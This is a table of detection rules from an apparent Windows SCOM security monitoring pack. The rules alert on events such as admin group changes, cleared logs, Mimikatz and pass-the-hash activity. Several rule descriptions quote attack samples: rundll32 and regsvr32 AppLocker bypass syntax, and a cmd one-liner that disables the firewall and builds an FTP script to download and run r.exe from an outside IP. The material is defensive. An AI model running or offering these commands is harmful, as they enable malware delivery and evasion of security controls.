All Rules in Security.Monitoring Management Pack

DisplayName	Description	ID	Target	Category	Enabled	Event_ID	Event Source	Alert Generate	Alert Severity	Alert Priority	Remotable	Event Log
Failed RDP Logon		SecurityMonitoring.Event.FailedLogin	Microsoft.Windows.Server.OperatingSystem	Custom	True	0		True	Warning	Normal	True	Security
Collect Failed Login Attemts	Failed Login Attempts	SecurityMonitoring.Failed.Login.Attempts.Collection	Microsoft.Windows.Computer	EventCollection	True	0		False			True
Security Monitoring: Domain Admins membership has changed		SecurityMonitoringMP.Accounts.DomainAdminChange	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Enterprise Admins membership has changed		SecurityMonitoringMP.Accounts.EnterpriseAdminChange	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Local Administrators Group was Modified		SecurityMonitoringMP.Accounts.LocalAdminChange	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Schema Admins membership has changed		SecurityMonitoringMP.Accounts.SchemaAdminChange	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Mimikatz in use	Mimikatz is a credential theft tool used for pass the hash attacks. This should not be present in your environment.	SecurityMonitoringMP.APPLocker.Mimikatz	Microsoft.Windows.Computer	Alert	False	0		True	Error	Normal	True	Microsoft-Windows-AppLocker/EXE and DLL
Security Monitoring: Prohibited App in Use		SecurityMonitoringMP.APPLocker.ProhibitedApp	Microsoft.Windows.Computer	Alert	True	0		True	Error	Normal	True	Microsoft-Windows-AppLocker/EXE and DLL
Security Monitoring: PSEXEC in Use		SecurityMonitoringMP.APPLocker.PSExec	Microsoft.Windows.Computer	Alert	False	8003		True	Error	Normal	True	Microsoft-Windows-AppLocker/EXE and DLL
Security Monitoring: WCE in Use	WCE is a credential theft too used to perform pass the hash attacks and enumerate wdigest passwords if this is turned on in your environment. Other than penetration testing, there is little reason for this tool to exist in your environment. This should be investigated immediately.	SecurityMonitoringMP.APPLocker.WCE	Microsoft.Windows.Computer	Alert	False	8003		True	Error	Normal	True	Microsoft-Windows-AppLocker/EXE and DLL
Security Monitoring: WinRar in use		SecurityMonitoringMP.APPLocker.WinRar	Microsoft.Windows.Server.OperatingSystem	Alert	False	8003		True	Error	Normal	True	Microsoft-Windows-AppLocker/EXE and DLL
Security Monitoring: A suspicious process creation (AppLocker bypass) was executed	To bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigated	SecurityMonitoringMP.Event.4688.SuspiciousApplockerJava	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was execuited	AppLocker Bypass Techniques using Regsvr32.exe (greg) Note: The following is already contained in SCUBA_RULE_Applocker_Bypass Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll	SecurityMonitoringMP.Event.4688.SuspiciousApplockerRegsvr	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring: A suspicious process creation (cmd) was executed	These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately.	SecurityMonitoringMP.Event.4688.SuspiciousCMD	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring: A suspicious process creation (FTP script execution via echo command) was executed	Detection of FTP Scripts created via the Echo command: Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware… Example of the commandline used to create and run ftp scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigated	SecurityMonitoringMP.Event.4688.SuspiciousFTPCommand	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring: A suspicious process creation (registry) was executed	This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear.	SecurityMonitoringMP.Event.4688.SuspiciousReg	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring; A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed	See: https://technet.microsoft.com/en-us/library/cc957410.aspx The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar Other console apps that can be modified to make the screen non-visible	SecurityMonitoringMP.Event.4688.SuspiciousWindowsPosition	Microsoft.Windows.Server.OperatingSystem	Alert	True	4688		True	Error	Normal	True	Security
Security Monitoring: Possible Golden Ticket in Use		SecurityMonitoringMP.Event.GoldenTicketDetection	Microsoft.Windows.Server.DC.Computer	Alert	True	4769		True	Error	Normal	True	Security
Security Monitoring: A New GPO has been created		SecurityMonitoringMP.Event.GPOCreation	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: A GPO was Deleted		SecurityMonitoringMP.Event.GPODelection	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Local account created on a member server	In a normal environment, this will only happen when the system is setup. You should not see this event on production member servers at all	SecurityMonitoringMP.Event.LocalAccountCreatedonServer	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Scheduled Task was Created		SecurityMonitoringMP.Event.ScheduledTaskCreation	Microsoft.Windows.Server.OperatingSystem	Alert	True	106		True	Error	Normal	True	Microsoft-Windows-TaskScheduler/Operational
Security Monitoring: Security Log was cleared	Clearing the security log is something an attacker will do to cover their tracks. By default, logs cycle. If the log has been cleared, this should be investigated.	SecurityMonitoringMP.Event.SecurityLogCleared	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: A Service was created on a domain controller	Monitors domain controller system logs for 7045 event ids (service created). Under normal state, this should never happen.	SecurityMonitoringMP.Event.ServiceCreatedonDC	Microsoft.Windows.Server.DC.Computer	Alert	True	0		True	Error	Normal	True	System
Security Monitoring: A service was created on a member server	I would consider enabling this rule for any production server that is in a steady state. No services should be created at this point, and any event where one is created would be worthy of investigation.	SecurityMonitoringMP.Event.ServiceCreatedonMemberServer	Microsoft.Windows.Server.OperatingSystem	Alert	False	0		True	Error	Normal	True	System
Security Monitoring: Service associated with a known threat was created on a member server	This is a special case of event ID 7045 targeting the names of services that are created by known tools such as windows credential editor, psexec, etc. If you turned on the generic 7045 rule, this alert should be disabled as it will generate duplicate events.	SecurityMonitoringMP.Event.ServiceKnownThreat	Microsoft.Windows.Server.OperatingSystem	Alert	True	7045		True	Error	Normal	True	System
Security Monitoring: A Smart Card has been Disabled to Allow for Interactive Logon	Someone has purposely desected the option to disable smart card authentication for the account. Verify that this has in fact been approved.	SecurityMonitoringMP.Event.SmartCardDisabled	Microsoft.Windows.Server.DC.Computer	Alert	True	4738		True	Error	Normal	True	Security
Security Monitoring: Software was Installed on a Server	This rule look sfor 11707 events in the application log and alerts accordingly. Note that patches will likely be flagged with this rule, so it should be turned on if there is a good maintenance process in place	SecurityMonitoringMP.Event.SoftwareInstallOnServer	Microsoft.Windows.Server.OperatingSystem	Alert	False	11707	MsiInstaller	True	Warning	Normal	True	Application
Security Monitoring: Software was Removed from a Server	This may not be a security event and is disabled by default. This could be enabled and edited to target security software in customer environments.	SecurityMonitoringMP.Event.SoftwareRemovedFromServer	Microsoft.Windows.Server.OperatingSystem	Alert	False	11724	MsiInstaller	True	Warning	Normal	True	Application
Security Monitoring: The system Log was cleared		SecurityMonitoringMP.Event.SystemLogCleared	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	System
Security Monitoring: A system has been powered off	This is not necessarily a security event, and as such it can generate noise and is off by default.	SecurityMonitoringMP.Event.SystemPoweredOff	Microsoft.Windows.Server.OperatingSystem	Alert	False	1074	User32	True	Warning	Normal	True	System
Security Monitoring: A system was restarted	This is not necessarily a security event, and as such this is disabled by default, but it can be useful in tracking security events or bad business practice.	SecurityMonitoringMP.Event.SystemRestarted	Microsoft.Windows.Server.OperatingSystem	Alert	False	1074	User32	True	Warning	Normal	True	System
Security Monitoring: Unexpected System Shutdown	This checks the system log for unexpected shutdown events and generates an alert. While not necessarily related to an attack, these events are potentially worth investigating for health reasons in the environment.	SecurityMonitoringMP.Event.UnexpectedShutdown	Microsoft.Windows.Server.OperatingSystem	Alert	False	0		True	Warning	Normal	True	System
Security Monitoring Collection: Event ID 4672		SecurityMonitoringMP.EventCollection.4672	Microsoft.Windows.Server.OperatingSystem	EventCollection	False	0		False			True
Security Monitoring Collection: Event ID 4624 Logon Type 4		SecurityMonitoringMP.EventCollection.BatchLogon	Microsoft.Windows.Server.OperatingSystem	EventCollection	True	0		False			True
Security Monitoring Event Collection: Event ID 4769 result 0x1F		SecurityMonitoringMP.EventCollection.GoldenTicket	Microsoft.Windows.Server.DC.Computer	EventCollection	True	0		False			True
Security Monitoring Collection: Event ID 4694		SecurityMonitoringMP.EventCollection.SpecialGroupLogon	Microsoft.Windows.Server.OperatingSystem	EventCollection	True	0		False			True
Security Monitoring Forwarded Events: A suspicious process creation (AppLocker bypass) was executed	To bypass restrictive Applocker policies, attackers will implement a specially crafted commandline which makes use of Windows native exe "Rundll32.exe" (required by Windows to load and run code in DLLs and therefore not blocked by Applocker). Rundll32.exe can be used to call javascript to execute arbitrary commands which are not blocked by restrictive Applocker policies. The rundll32.exe syntax is as follows: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";<code> Events of this nature need to be investigated	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerJava	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring: A suspicious process creation (AppLocker bypass using regsvr32) was execuited	AppLocker Bypass Techniques using Regsvr32.exe (greg) Note: The following is already contained in SCUBA_RULE_Applocker_Bypass Examples: regsvr32 /s /n /u /i:file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll regsvr32 /s /n /u /i:http://server/file.jpg scrobj.dll	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousApplockerRegsvr	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: A suspicious process creation (cmd) was executed	These events should be investigated. We are tracking 4688 events with known strings often found in malicious scripts. While it is possible that there are normal conditions for this rule, any alert should be investigated immediately.	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousCMD	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: A suspicious process creation (FTP script execution via echo command) was executed	Detection of FTP Scripts created via the Echo command: Based on several cases where compromised SQLService was used and SQL Agent Jobs were created to invoke ‘xp_cmdshell’ which in turn created and launched FTP scripts to download and run malware… Example of the commandline used to create and run ftp scripts: "Command Line ": "\"\"\"C:\\Windows\\System32\\cmd.exe\"\" /c \"\"net1 stop sharedaccess&echo open 222.186.58.12 >> love.txt&echo 123>> love.txt&echo 123>> love.txt&echo binary >> love.txt&echo get r.exe >> love.txt&echo bye >> love.txt&ftp -s:love.txt&p -s:love.txt&r.exe&r.exe&del love.txt /q /f&exit\"\"\" This type of event is rare and should be investigated	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousFTPCommand	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: A suspicious process creation (registry) was executed	This rule inventories 4688 events and flags alerts for manually added registry keys. These are rare events and should be investigated when they appear.	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousReg	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: A suspicious process creation (malicious use of WindowPosition with PowerShell) was executed	See: https://technet.microsoft.com/en-us/library/cc957410.aspx The WindowPosition value specifies the position of the command window on the user's screen. The value of this entry is an 8-byte hexadecimal value. The first four bytes (high word) represent the position of the window on the X (horizontal) axis. The last four bytes (low word) represent the position of the window on the Y (vertical) axis. When the WindowPosition value is set to 201329664, (Hex: 0x0c00 0c00) this places the console in a non-visible section of the user’s screen (where X axis=0c00 and the Y axis=0c00) in an area that is hidden from view below the visible start menu/taskbar Other console apps that can be modified to make the screen non-visible	SecurityMonitoringMP.ForwardedEvents.4688.SuspiciousWindowsPosition	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	4688		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Potential Credential Swap in Progress		SecurityMonitoringMP.ForwardedEvents.CredentialSwap	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Local User Created or Deleted in Administrator Security Group		SecurityMonitoringMP.ForwardedEvents.LocalUserCreatedDeleted	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Invoke-Mimikatz in use	If you're forwarding powershell logging to an event collector, the use of invoke-mimikatz on a desktop will trigger this alert. This indicates the possible compromise of an end user system.	SecurityMonitoringMP.ForwardedEvents.PowerSploit	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	800		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Prohibited App in Use		SecurityMonitoringMP.ForwardedEvents.ProhibitedApp	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	8003		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Possible PtH Attack in Progress Against Tier 2		SecurityMonitoringMP.ForwardedEvents.PtHTier2	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	False	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Security log cleared on a server configured to forward events		SecurityMonitoringMP.ForwardedEvents.SecurityLogCleared	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Service Created on system		SecurityMonitoringMP.ForwardedEvents.ServiceCreation	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	False	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Service associated with a known threat was created on a forwarding computer		SecurityMonitoringMP.ForwardedEvents.ServiceCreationKnownThreats	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	7045		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: Special Group logon event		SecurityMonitoringMP.ForwardedEvents.SpecialGroupLogon	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	0		True	Error	Normal	True	ForwardedEvents
Security Monitoring Forwarded Events: System Log was Cleared		SecurityMonitoringMP.ForwardedEvents.SystemLogCleared	WindowsEventCollectorDiscovery.EventLogCollectorServer	Alert	True	0		True	Error	Normal	True	ForwardedEvents
GPO Change Event then run correlation script Rule		SecurityMonitoringMP.GPOMonitoring.EventAndScript.Rule	Microsoft.Windows.Server.DC.Computer	Custom	True	0		True	Error	Normal	True
Security Monitoring: Invoke-Mimikatz in use	If powerhsell logging is enabled, this will detect output from Powershell exploit tool kit	SecurityMonitoringMP.PowerShellLog.PowerSploit	Microsoft.Windows.OperatingSystem	Alert	True	800		True	Error	Normal	True	Windows PowerShell
Security Monitoring: Potential Credential Swap in Progress		SecurityMonitoringMP.Pth.CredentialSwap	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring: Possible PtH attack in progress (successful) against DC		SecurityMonitoringMP.Pth.PtHAgainstDC	Microsoft.Windows.Server.DC.Computer	Alert	False	0		True	Error	Normal	True	Security
Security Monitoring: Possible PtH Attack in Progress against tier 1		SecurityMonitoringMP.Pth.PtHAgainstTier1	Microsoft.Windows.Server.OperatingSystem	Alert	False	0		True	Error	Normal	True	Security
Security Monitoring Threat Hunting: Batch Logon in use	This rule checks the security log for event ID 4624 Logon Type 4. Logon type 4 is a batch logon, which essentially means that there are exposed credentials on this system. Investigation should determine which application is using said credentials. Once the applications are remediated, batch logons can be disabled, making your environment more secure.	SecurityMonitoringMP.ThreatHunt.BatchLogonInUse	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security
Security Monitoring Threat Hunting: Kerberos Integrity Check on Decrypted Field Failed	http://cert.europa.eu/static/WhitePapers/CERT-EU-SWP_14_07_PassTheGolden_Ticket_v1_1.pdf	SecurityMonitoringMP.ThreatHunt.GoldenTicket	Microsoft.Windows.Server.DC.Computer	Alert	True	4769		True	Error	Normal	True	Security
Security Monitoring Threat Hunting: Special Group logon event	This rule will not generate any noise under normal environment. It requires special groups auditing turned on via GPO as well as the specific memberships to be targeted in the registry. If you've done these tasks, this monitor will alert every time a user that is a member of these	SecurityMonitoringMP.ThreatHunt.SpecialGroupLogon	Microsoft.Windows.Server.OperatingSystem	Alert	True	0		True	Error	Normal	True	Security